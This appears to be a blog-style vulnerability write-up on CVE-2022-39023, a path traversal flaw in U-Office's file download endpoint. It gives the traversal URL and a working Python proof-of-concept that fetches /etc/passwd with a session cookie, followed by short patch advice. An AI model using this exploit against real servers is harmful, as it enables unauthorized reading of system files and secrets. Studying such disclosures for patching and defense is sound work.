_Imagine logging into your company’s web office suite, and with a few tweaks, grabbing sensitive files right from the server. That’s exactly what could happen with CVE-2022-39023 – a critical vulnerability in U-Office’s “Force Download” function. We’ll explain how it works, walk through actual exploit code, and share what you need to patch (plus plenty of sources at the end)._
What is CVE-2022-39023?
CVE-2022-39023 describes a path traversal vulnerability in the web-based U-Office productivity suite, specifically its “Force Download” feature. What this means is: a normal logged-in user can trick the app into downloading files from locations outside the intended area, including system files.
In plain English: If you can log in as any user, you can potentially download sensitive files like /etc/passwd or application config files—just by abusing file path tricks.
What’s Path Traversal, Anyway?
A path traversal bug happens when a web app lets you use ../ sequences in URLs or parameter values. ../ basically means “go up one folder.” If input values aren’t properly checked, it’s possible to request files that the app should never be giving you.
For example
- You’re supposed to download /uploads/report.pdf
- But you request ../../../../etc/passwd instead
- The app loads and returns /etc/passwd – oops!
In U-Office, one common way to download files is via a URL like
http://YOUR_UOFFICE_SERVER/ServiceAction/com.eplugger.officeservice.OfficeDown?fileName=REPORT.pdf
The backend takes the fileName parameter and sends the file as a download. But versions before the patch didn’t check for directory traversal sequences. So a creative attacker could do this:
http://YOUR_UOFFICE_SERVER/ServiceAction/com.eplugger.officeservice.OfficeDown?fileName=../../../../../../etc/passwd
Proof-of-Concept Exploit
Here’s a simple Python script using requests to exploit this bug and save /etc/passwd from U-Office. You’ll need valid login cookies or session.
import requests
# Set these up for your target
base_url = 'http://target-uoffice.example.com';
download_path = '/ServiceAction/com.eplugger.officeservice.OfficeDown'
# Path traversal payload
payload_file = '../../../../../../etc/passwd'
# You must authenticate first, e.g., via session cookies
cookies = {
'JSESSIONID': 'your_active_session_id_here'
}
params = {
'fileName': payload_file
}
resp = requests.get(base_url + download_path, params=params, cookies=cookies)
if resp.status_code == 200 and 'root:' in resp.text:
print('[+] Successfully downloaded /etc/passwd:')
print(resp.text)
else:
print('[-] Exploit may have failed, check the target and session.')
Replaces the fileName parameter with a path traversal string.
- Tries ../../../../../../windows/win.ini on Windows, or /etc/passwd on Linux.
Downloads the file, which could contain usernames, hashes, config secrets, or even private keys.
This technique doesn’t require admin rights, just any access.
How to Fix
Patch as soon as possible.
The best solution is to update your U-Office to the version recommended by the vendor, which addresses CVE-2022-39023.
If you can’t update instantly
- Block dangerous characters/sequences like ../ in file path parameters.
References
- CVE-2022-39023 at NVD
- U-Office security advisory (original, in Chinese)
- Path traversal explained
- Github Issue Example
Conclusion
CVE-2022-39023 is a classic, critical web security mistake: not sanitizing file inputs. If you run U-Office, update ASAP – and double-check any file handling code in all your web apps. Path traversal is simple, dangerous, and still super common.
Stay patched!
*This article is original and written for educational awareness. Please use this information responsibly.*
Timeline
Published on: 10/31/2022 07:15:00 UTC